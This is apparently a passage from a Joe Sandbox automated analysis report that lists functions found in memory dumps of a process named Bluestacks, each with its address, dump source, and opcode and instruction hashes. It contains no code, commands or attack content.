Instruction Fuzzy Hash: 35214F30B1890A8BDB48DF18C4A59B8B3E2FF5A314B508139D55ED3682DF38BC52DB80

Function 00007FFD34A6E6E9 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0cd58c82b67d8c026bf39fbcf5b91d7019b02d803d66b282d62f3695acec83f
Instruction ID: 5443203ed6c84c7aeb2a42e2cbca9ba67c628fda161af39c7435dcf4aa318734
Opcode Fuzzy Hash: a0cd58c82b67d8c026bf39fbcf5b91d7019b02d803d66b282d62f3695acec83f
Instruction Fuzzy Hash: 12211871F199099FDF98DB58C4A5AAEB7B1FF69314F1000BED14EE3291DE38A9408B40

Function 00007FFD34A62EE0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b2f23f53d4d9a32e32e245d9599de135f2b8e2ad8b94bbfba5c0f6382ff5c8
Instruction ID: cf5969a626b945cd504c34bca40614ceceb06e9cdd959fbf12e81086934b6e76
Opcode Fuzzy Hash: b7b2f23f53d4d9a32e32e245d9599de135f2b8e2ad8b94bbfba5c0f6382ff5c8
Instruction Fuzzy Hash: DB110D12E5C4678BE728D20480F55B87391EF55315B344A7DD54BCB5DAC93CB9D1A380

Function 00007FFD34A6C020 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7185b1d99ae03951f51332e297f0060fc162b81f2b8ce16c803d68d2b5387d84
Instruction ID: 85ad3b7c4e8e2e70e08195109080dd903c1462b7d48dfb0cbf2b32a058f94905
Opcode Fuzzy Hash: 7185b1d99ae03951f51332e297f0060fc162b81f2b8ce16c803d68d2b5387d84
Instruction Fuzzy Hash: 4411DD10B5C46BCAF728D60884F06B47755FF51325B35467AD54FCB5CAC82CB981A780

Function 00007FFD346708F8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53add752f6c31b0ee3e893d005053132a81d5b3208b78c74198c8bd131a2d44b
Instruction ID: c7bcca38df4d0d0c167178fb4ee28145e6f972ad4db2ea0f534300715c02827e
Opcode Fuzzy Hash: 53add752f6c31b0ee3e893d005053132a81d5b3208b78c74198c8bd131a2d44b
Instruction Fuzzy Hash: 85014732B0D93D0B9668D41DDC8B979B7C2DBCBA703155239D98EC3242DC04BC5342C0

Function 00007FFD34A6E70E Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5daff14d6b8aeb71b89e4b494ead6d7a208ff55f91cbcf28cb2ce83ce17968e
Instruction ID: f9d8a3d96a82f5c98ff959e8e6243df5c48bf8a94e6975c4dfd30a29c5e9e699
Opcode Fuzzy Hash: b5daff14d6b8aeb71b89e4b494ead6d7a208ff55f91cbcf28cb2ce83ce17968e
Instruction Fuzzy Hash: 80110A31F189198FDF98DB58D4A5AFDB7B1EF59314F1001BED14EE2691DE2969808B00

Function 00007FFD34A6944E Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f990aff7210d34aec8ff3ee5b7bd62d2c339e97c4c171dbe7f5917d09d7ab984
Instruction ID: 3c2c9ba207b0e92562f022dc648aa558c17bc69a68cdfeb03e7bbec713c348dd
Opcode Fuzzy Hash: f990aff7210d34aec8ff3ee5b7bd62d2c339e97c4c171dbe7f5917d09d7ab984
Instruction Fuzzy Hash: A8110730A1891D9FDF9CDB58C4A5ABDB7B5EB59314F1001BED10EE3291CE29A9818B40

Function 00007FFD34670C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a05a618b3bee10acc5b17436c1d2b320dea52c016ec2870fde39eb2a736548c
Instruction ID: dce76f6a72931f1156f1e5fc0502e5967434a03a08270da512d81fa4d7aeaddb
Opcode Fuzzy Hash: 4a05a618b3bee10acc5b17436c1d2b320dea52c016ec2870fde39eb2a736548c
Instruction Fuzzy Hash: B211A375B0DA698FE701DF688CA11ED7FA0EF53311F1480B6C244DB182D93CA54697A0

Function 00007FFD3467108D Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8c474b1bc4dae98e877a824bf625a5686be57d4ae69c5dd3ae7947ab5b06b2e
Instruction ID: 5dfd2ab3c9d5965bdafddd6e0bfb8283f22c24b564c0d506396f10e337c477f6
Opcode Fuzzy Hash: f8c474b1bc4dae98e877a824bf625a5686be57d4ae69c5dd3ae7947ab5b06b2e
Instruction Fuzzy Hash: 9B01D625A8E6E10FE36A9AB05CB15F57FE4DF8721070941FFD189CB1A3CC4D58868351

Function 00007FFD34670C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1af1fbee5c9acf7314058065f17445b896e012784a279d5f040fc814318b9a1d
Instruction ID: 53119808b977627c3088444142017b92a88fcc8cca657f9898189c899f9d480f
Opcode Fuzzy Hash: 1af1fbee5c9acf7314058065f17445b896e012784a279d5f040fc814318b9a1d
Instruction Fuzzy Hash: 8911A175A0EA998FE702DF688CA11ED7FB0EF53311F1480B6C144DB192D93CA64597A0

Function 00007FFD34675AAE Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dd0442cec50fcf9f813f5d51f3291f099cd7a6614cc1af108d29c9622c2f808
Instruction ID: 95a8f4eaf2b7538fddbb5c711dac3d2c727f33e6b847c231256782ce3fe70c5e
Opcode Fuzzy Hash: 1dd0442cec50fcf9f813f5d51f3291f099cd7a6614cc1af108d29c9622c2f808
Instruction Fuzzy Hash: 4511F130A485198FDB95DE14C8E4BE977F1FB58301F5441EAD10ED7690CA35AA81CF40

Function 00007FFD34A6A3B9 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b9189ecc45b7e8867047ce58e0510ebd60655f0f49b0e6e3ef2eb58d064a883
Instruction ID: d5b1d819f9fc789bc57686a2f1bb92c900d011e89909760f5f38e75298b801af
Opcode Fuzzy Hash: 4b9189ecc45b7e8867047ce58e0510ebd60655f0f49b0e6e3ef2eb58d064a883
Instruction Fuzzy Hash: 2E012B36B0D78E4FE76095644CA85E93BD4DF47324F1404BAE14AC71D2DD5C6C05D361

Function 00007FFD346747EE Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2c788506ba1842aac4210cc89eee602e341d5695898e83dfdebda82c0f20a97
Instruction ID: 2183139b7b220a8ec01fba525c4c589f37d4ea8703834619376c682c04878885
Opcode Fuzzy Hash: e2c788506ba1842aac4210cc89eee602e341d5695898e83dfdebda82c0f20a97
Instruction Fuzzy Hash: 87014F20B089294BFF84FF24C8E8AF827D1EF96300F158475D68AD7292DD2CEC41AB00

Function 00007FFD34A6D86D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 933f21cdf70af4acaa761b98695f6818c01238713377df0d8113bba50c866545
Instruction ID: b5fa92cdd893aae39343eeff2262b92ba2e7e44dbd55901236d6a4e575cbb724
Opcode Fuzzy Hash: 933f21cdf70af4acaa761b98695f6818c01238713377df0d8113bba50c866545
Instruction Fuzzy Hash: A6F0A93544E2C04FC3128B748C29992BFE0EF1B21470E82EED0C9CB4A3C25D84868701

Function 00007FFD34670C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68bcf5b891e19aacc649d87ca8ebf0919644c7f51d197e24efecd2ba06f754d
Instruction ID: fda5ef0c2cc9a9d9529772e5706b05a9dcbb1cf7cf1a8ee86186262c505133c7
Opcode Fuzzy Hash: c68bcf5b891e19aacc649d87ca8ebf0919644c7f51d197e24efecd2ba06f754d
Instruction Fuzzy Hash: 1101C075A0E6998FE701DF648CA00ED7FB0EF43310F1480F6C144DB192D938A6459790

Function 00007FFD34A670A5 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 159e69f76ef4b041da678a9777f80c32f7946dc46beb8d9ea6db99ee9a1b0a92
Instruction ID: 93174ae0610cbe815877fa4c225ef7e6fb1cb0e39822b50a43d9164afe3353c0
Opcode Fuzzy Hash: 159e69f76ef4b041da678a9777f80c32f7946dc46beb8d9ea6db99ee9a1b0a92
Instruction Fuzzy Hash: 9CF0FC21F0C68E57F77095944C652FE3B95DF47318F104535E18DD6183DD5C6C059791

Function 00007FFD346747CE Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2856ed1f5d6448653bd84155c5fa40ad527b9ed88c20968fbdb190cc7906fb3
Instruction ID: 499901d34be75f2657ab75612dfd970a0bfde40fc64246d68b5af1c9158b6420
Opcode Fuzzy Hash: a2856ed1f5d6448653bd84155c5fa40ad527b9ed88c20968fbdb190cc7906fb3
Instruction Fuzzy Hash: EF01E120F1993E5BF7E4DE1888E97F85A91BF5A300F5045B5D58DE3292DD2CAD805710

Function 00007FFD34A6A589 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a977e37ed607dd11d1e30d26abae196c29a638318a3b75592695f53815de50d
Instruction ID: cec7582034c96ec723b0754c5f8f50e8bf282477bb770a26bf16789dc309ae3a
Opcode Fuzzy Hash: 4a977e37ed607dd11d1e30d26abae196c29a638318a3b75592695f53815de50d
Instruction Fuzzy Hash: F7F03C71B199584FEB54EB6898B26ACBBF1EF5A314B1400BDD44ED32D7DE2DA8428700

Function 00007FFD34670C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5f3769b388c6a9352da6c7b00bba425a3898934667ca6fee187f7b619346a61
Instruction ID: 6d152109b106c0a012749697af5369122009a29c8857e58002de6b052de43951
Opcode Fuzzy Hash: d5f3769b388c6a9352da6c7b00bba425a3898934667ca6fee187f7b619346a61
Instruction Fuzzy Hash: AF017C74E0EB999FEB11DF6488A01ED7FB0EF13314F1481E6D144DB182EA3CAA459791

Function 00007FFD34A6B0A0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d7fe1aab749fa879584df2f6b690dde211bb3b1c274f4266097c6e8915dcc14
Instruction ID: 7ae954f20e7165973a149765719a8b43c6b29d52446c105b0c8364372c8becc4
Opcode Fuzzy Hash: 2d7fe1aab749fa879584df2f6b690dde211bb3b1c274f4266097c6e8915dcc14
Instruction Fuzzy Hash: 9FF04420B18E198AEAA4EF25C0B1AB673D2EF99308F504538D48FC75D3DD2CF4469740

Function 00007FFD34A69722 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c82728b17730e82a2c66b4baf6434482329d8848f881d239ad0a7dc950faf3b5
Instruction ID: fc380b7685997bd7ae620daef55059a1be8aaa845d32e67d67660976ff3bb30e
Opcode Fuzzy Hash: c82728b17730e82a2c66b4baf6434482329d8848f881d239ad0a7dc950faf3b5
Instruction Fuzzy Hash: 66F0967284E3C59FD7128F7088A14E57FB8AF43228F2800F6D145CB0A2C52D6A46D761

Function 00007FFD34A61F60 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1126e049757cf81fb3c889f1984312b7d02c80c2bcebc6f0f259e93a3cd25453
Instruction ID: d942b432db43c83b8a33ce3d88602f2e52f606d96072d5c1775f1c5287f101d3
Opcode Fuzzy Hash: 1126e049757cf81fb3c889f1984312b7d02c80c2bcebc6f0f259e93a3cd25453
Instruction Fuzzy Hash: F1F0A420B18E568EEAA4EF64C0B1AF672D2AF5A314B40493D948FC76D6DE2CF4499740

Function 00007FFD34A605D2 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96286048acc54789fca78dce7e3f9a1c97d3cb1436e736f612697f3299d12f69
Instruction ID: 16fdbb3700b5c2578e2f464d9597359d052922fa1bef47f3964c406ac567b459
Opcode Fuzzy Hash: 96286048acc54789fca78dce7e3f9a1c97d3cb1436e736f612697f3299d12f69
Instruction Fuzzy Hash: A2F0F63184E3C99FD312CB7088B14E93FB4EF43218F1800F6D545CB0A2C66C1646E761

Function 00007FFD34A6E9E2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ff6d66707d4672d1897349c24c555277e4ef0e8914b08b1fc6606441c1922e0
Instruction ID: 47325d3fde523da555321a828484ee874f628a49e89ec154c34f1164bfaee758
Opcode Fuzzy Hash: 6ff6d66707d4672d1897349c24c555277e4ef0e8914b08b1fc6606441c1922e0
Instruction Fuzzy Hash: 5DF0963654E2C69FD312CB7088654DA7FB4FF53228F2900F6D145CB0A2DA6D260AD761

Function 00007FFD34A61DDE Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 016ed4fadb287b95827c9c411dbe65eb1986251ae020b9f874599f29884cc26f
Instruction ID: e3bb6f6024861e7d0747fda03ba0e634697d1587eb4cbfad42ea80bae65a259c
Opcode Fuzzy Hash: 016ed4fadb287b95827c9c411dbe65eb1986251ae020b9f874599f29884cc26f
Instruction Fuzzy Hash: 5CF067307089068BE758CA08C0B97B573D2EF5A328F20453DE95AC76D1EE6EE8808B40

Function 00007FFD34A6AF1E Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2839d9530783c7908752ddeffadb30afb851cbb22e7d81870124344009468250
Instruction ID: 29b3ea3ba5af8b93eca5cc82b18359177a6f54bfe211553fc3b5b44e35c36764
Opcode Fuzzy Hash: 2839d9530783c7908752ddeffadb30afb851cbb22e7d81870124344009468250
Instruction Fuzzy Hash: 2DF090307089068BF718DA08D0B57B533D2EB5A318F20457DD92AC72D1DE6EF4408740

Function 00007FFD34A60293 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
Instruction ID: f80b15d410e1df9e481b2a69e31084751483cac112b0c00ad883f7da5cda05d9
Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
Instruction Fuzzy Hash: AD010070A1992C8FDFA8DB08C8A4BA8B7B1FB69305F1041D9800EE3650CB359E84DF01

Function 00007FFD34A68CFE Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99927d0b9716c8a04f94f7f185d83cd53b6922ced33cd01a2100db852817900b
Instruction ID: ae3bbf5baaf1f38eb756b8a97fcc83214f1191bcc9f2bc1acff250d9e4e3c48e
Opcode Fuzzy Hash: 99927d0b9716c8a04f94f7f185d83cd53b6922ced33cd01a2100db852817900b
Instruction Fuzzy Hash: C6F06530B08D058FD758EF2C546A23972D2FF9C315710457FA04ED76A2CE79D8414701

Function 00007FFD34A6DFBE Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72e208b9fadce1dabf41845f570a7d458eaa4d434f2eee5f86e3071375809720
Instruction ID: 02cca39fa91faad208b319c2cae6e1c8f700123d9a60e20df328e74e805e0e9f
Opcode Fuzzy Hash: 72e208b9fadce1dabf41845f570a7d458eaa4d434f2eee5f86e3071375809720
Instruction Fuzzy Hash: BFF03030B089048FE758EF28406A63972D2EF98215710007EA48EC76A1CE7598414741

Function 00007FFD346710C0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98f0608037f0dbceee48e27121773d065fb4128885dce1cee15b40c8fe86dd4d
Instruction ID: 9fe0f2a5f1c1c9a5964120c58eb2640ee36acc8777f338e7a00c5f7ee0bd7004
Opcode Fuzzy Hash: 98f0608037f0dbceee48e27121773d065fb4128885dce1cee15b40c8fe86dd4d
Instruction Fuzzy Hash: 89E02621B4CC5906EB7CA9B468B21F47280DB86314B0401BED14AC22C6CC4D5CC14280

Function 00007FFD3467480B Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2288c99eab7b3ce79b0c5988de62a37b3f12b0a73a0bcbac6919596a7fbac341
Instruction ID: 135c3b4c9c4e393ceb03ccd7f056468db9e278f93d3abab9c53b5b3cfe769171
Opcode Fuzzy Hash: 2288c99eab7b3ce79b0c5988de62a37b3f12b0a73a0bcbac6919596a7fbac341
Instruction Fuzzy Hash: 97F09830A5893E8AEB94AE508CE86F86761BF16305F1045B9C28DD7191CA6C6981AA10

Function 00007FFD34676DE8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe0b75d08b9c301d64e052730cfc3b5d421e3e3e28d73b2336f9e0da07ec4312
Instruction ID: 880944a4ca1a7e5abc769b26202ec5598320461936a55bcb254de24b44cde93f
Opcode Fuzzy Hash: fe0b75d08b9c301d64e052730cfc3b5d421e3e3e28d73b2336f9e0da07ec4312
Instruction Fuzzy Hash: 17E03964B081668AF7505A44C8F03ED6621FB85300F24D479DA4EE73C2CD2C9D46A761

Function 00007FFD34A671A8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0efdcf85dd576d3031c9461288f164aff5d270bc22803040b0f5aaf7ab49cef7
Instruction ID: 5c3482b347d03b5dafe846fbb524d2b23b3d17320ca3dba6c3a55c68fcb520d9
Opcode Fuzzy Hash: 0efdcf85dd576d3031c9461288f164aff5d270bc22803040b0f5aaf7ab49cef7
Instruction Fuzzy Hash: 6AE0E579E2980E8EDF94DB84C4A15FDB7B1FF49369F200037C20EE21A0DA2C2500AA60

Function 00007FFD34A6A412 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a25fa914d06831eac835e4ff343ff1302396900a616972b4a152bb44c3d6211c
Instruction ID: 8bc787f2fc5ee013007054301640792a2af523adde5cbe689881fe3b33bcad56
Opcode Fuzzy Hash: a25fa914d06831eac835e4ff343ff1302396900a616972b4a152bb44c3d6211c
Instruction Fuzzy Hash: 1BE0CD56F0E3834FE766067008B90B42BC0DF173647550475C657CA1D3EC9C2C465321

Function 00007FFD346748AE Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83accb6ea45df16bc0cc82df944b8a2b1f38f4474f06db1afa9d6c8db19a8251
Instruction ID: f4fc81388a3dccbfe8e8f0fec83a23af3ddf442da1d678c8eaade9b1d32f00f8
Opcode Fuzzy Hash: 83accb6ea45df16bc0cc82df944b8a2b1f38f4474f06db1afa9d6c8db19a8251
Instruction Fuzzy Hash: 3BE09A20B1857947FA90DE148DE87F81B51AF47300F1081B5C68DD31D2CD1DAD81AA10

Function 00007FFD34670B9D Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
Instruction ID: 82f479a2fca025f8d34a3513ca480f6ddc2dcfeb09ac67db4faec6ff009333e2
Opcode Fuzzy Hash: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
Instruction Fuzzy Hash: 30C0123062880E8FDA40BB28C888828BBA0FB0F305BD914E0E00CCB1A1D61998948701

Function 00007FFD346706A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
Instruction ID: c345ee7466010aebb398367bce60842aff246f5d4e2f226a0d64364be77f1790
Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
